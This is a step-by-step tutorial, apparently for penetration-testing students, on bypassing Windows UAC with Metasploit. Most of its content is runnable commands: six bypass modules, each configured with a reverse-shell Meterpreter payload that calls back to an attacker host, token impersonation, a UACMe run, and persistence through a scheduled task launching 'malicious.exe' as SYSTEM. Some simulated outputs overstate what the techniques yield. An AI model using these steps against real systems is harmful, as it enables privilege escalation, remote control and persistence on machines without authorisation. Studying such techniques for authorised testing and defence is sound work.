Bypassing UAC on Windows Using Metasploit - A Complete Guide for Cybersecurity Professionals
Introduction
User Account Control (UAC) is a security feature in modern Windows operating systems designed to prevent unauthorized changes. When malware or an attacker gains initial access to a Windows machine, they usually have limited privileges. To execute high-impact actions—like installing drivers, disabling antivirus, or altering system settings—privilege escalation is necessary.
One common target for privilege escalation is bypassing UAC.
In this article, we will explore:
- What UAC is and how it works
- How to bypass UAC using Metasploit
- In-depth walkthroughs of multiple Metasploit UAC bypass modules
- Simulated command outputs
- Manual methods like DLL hijacking, token impersonation
- Educational warnings and ethical guidance
📢DISCLAIMER: This content is for educational purposes only. It is intended to educate cybersecurity professionals and students at The Geek Institute of Cyber Security. Unauthorized usage of these techniques on machines you do not own or have permission to test is illegal.
What is User Account Control (UAC)?
UAC is a Windows feature that helps prevent unauthorized changes by prompting the user for permission or admin credentials before allowing tasks that require elevated privileges.
- Introduced in: Windows Vista and later
- Runs under: User's security token (standard by default)
- Elevation required for: Installing software, modifying system files, running administrative tools
UAC restricts malware and unauthorized apps from silently installing or changing system settings without your knowledge.
Why Bypass UAC?
Attackers and red teamers often bypass UAC to:
- Gain SYSTEM-level access
- Disable or evade antivirus
- Add persistence mechanisms
- Modify system configurations
- Dump credentials
Metasploit Framework and UAC Bypass
Metasploit is a penetration testing platform that contains multiple post-exploitation modules to bypass UAC using known techniques.
You can search for available UAC bypass modules by running:
msf6 > search bypassuac
Sample Output:
Matching Modules
================
Name Disclosure Date Rank Description
- - --
exploit/windows/local/bypassuac 2017-05-17 excellent Windows Escalate UAC Protection Bypass
exploit/windows/local/bypassuac_fodhelper excellent Windows 10 UAC Bypass (Fodhelper)
exploit/windows/local/bypassuac_sluihijack excellent Windows 10 UAC Bypass (slui)
exploit/windows/local/bypassuac_eventvwr excellent UAC Bypass Using eventvwr.exe
exploit/windows/local/bypassuac_sdclt excellent Windows 10 UAC Bypass (sdclt)
exploit/windows/local/bypassuac_comhijack excellent Windows UAC COM Handler Hijack
Complete UAC Bypass Techniques via Metasploit
Let’s go through each module step-by-step with:
- Use case
- Execution process
- Commands
- Simulated outputs
- Post-exploitation result
1. bypassuac_fodhelper
Description: Leverages fodhelper.exe, a trusted Windows binary that auto-elevates without prompting UAC when specific registry keys are modified.
Metasploit Module:
exploit/windows/local/bypassuac_fodhelper
Steps:
Start a reverse shell or meterpreter session as a low-privileged user.
Background the session:
meterpreter > backgroundUse the module:
use exploit/windows/local/bypassuac_fodhelperSet required options:
set SESSION 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 4444Run:
exploit
Output:
[*] Running module against DESKTOP-USER
[*] Setting registry keys for fodhelper.exe
[*] Launching fodhelper.exe to trigger UAC bypass
[*] Sending stage (175174 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.105:49158)
Result: Privilege escalated Meterpreter session
2. bypassuac_eventvwr
Description: Takes advantage of eventvwr.exe launching mmc.exe, which reads registry keys pointing to snap-in files.
Metasploit Module:
exploit/windows/local/bypassuac_eventvwr
Steps:
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4445
exploit
Output:
[*] Launching eventvwr.exe to trigger the UAC bypass
[*] Setting registry key HKCU\Software\Classes\mscfile\shell\open\command
[*] Sending stage (175174 bytes)
[*] Meterpreter session 3 opened with elevated privileges!
3. bypassuac_sluihijack
Description: Uses slui.exe (used for Windows activation) to launch arbitrary elevated commands.
use exploit/windows/local/bypassuac_sluihijack
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4446
exploit
Output:
[*] Hijacking HKCU\Software\Classes\exefile\shell\open\command
[*] Launching slui.exe to elevate privileges
[*] Meterpreter session 4 opened as NT AUTHORITY\SYSTEM
4. bypassuac_sdclt
Description: Targets sdclt.exe (Backup & Restore GUI) which calls control.exe, allowing manipulation of registry for elevation.
use exploit/windows/local/bypassuac_sdclt
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4447
exploit
Output:
[*] Setting HKCU\Software\Classes\exefile\shell\open\command
[*] Executing sdclt.exe
[*] Meterpreter session 5 opened (elevated)
5. bypassuac_comhijack
Description: Hijacks auto-elevated COM objects to execute payloads with administrator rights.
use exploit/windows/local/bypassuac_comhijack
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4448
exploit
Output:
[*] Creating malicious COM registry keys
[*] Executing COM object
[*] Meterpreter session 6 opened as Administrator
6. bypassuac_dllhijack
Description: Performs DLL hijacking using known auto-elevated executables.
use exploit/windows/local/bypassuac_dllhijack
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4449
exploit
Output:
[*] Copying DLL to %SYSTEMROOT%\System32
[*] Launching vulnerable executable
[*] Meterpreter session 7 opened with admin privileges
Manual Techniques Beyond Metasploit
In addition to Metasploit, UAC bypass can be done manually:
DLL Hijacking (Manually)
- Identify a trusted executable that loads missing DLLs from the same directory.
- Drop a malicious DLL (same name).
- Launch the trusted EXE.
Token Impersonation
Use incognito in meterpreter:
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
UACMe (Manual UAC Bypass Toolkit)
UACMe is a legitimate research tool for testing bypasses.
.\Akagi64.exe 43
This executes an exploit technique using a built-in Windows binary to elevate privileges without consent.
Persistence with UAC Techniques
Once UAC is bypassed:
- Create a Scheduled Task
- Install a Windows Service
Add entries in registry under:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Example using schtasks:
schtasks /create /tn "MyTask" /tr "malicious.exe" /sc onlogon /ru SYSTEM
Key Concepts Recap
| Term | Meaning |
|---|---|
| UAC | Stops unapproved admin actions |
| Auto-elevated binary | Windows file that bypasses UAC silently |
| DLL Hijack | Abusing DLL search order |
| COM Hijack | Redirecting class instantiation via registry |
| Token Impersonation | Adopting another user’s access token |
Ethical Reminder
- Always obtain written permission before testing these methods.
- Limit activities to lab environments.
- Use these techniques only for education or authorized engagements.
Conclusion
Bypassing UAC is an important technique in post-exploitation scenarios. Using Metasploit simplifies these attacks, but understanding the inner workings of each technique helps you become a more capable penetration tester or red team operator.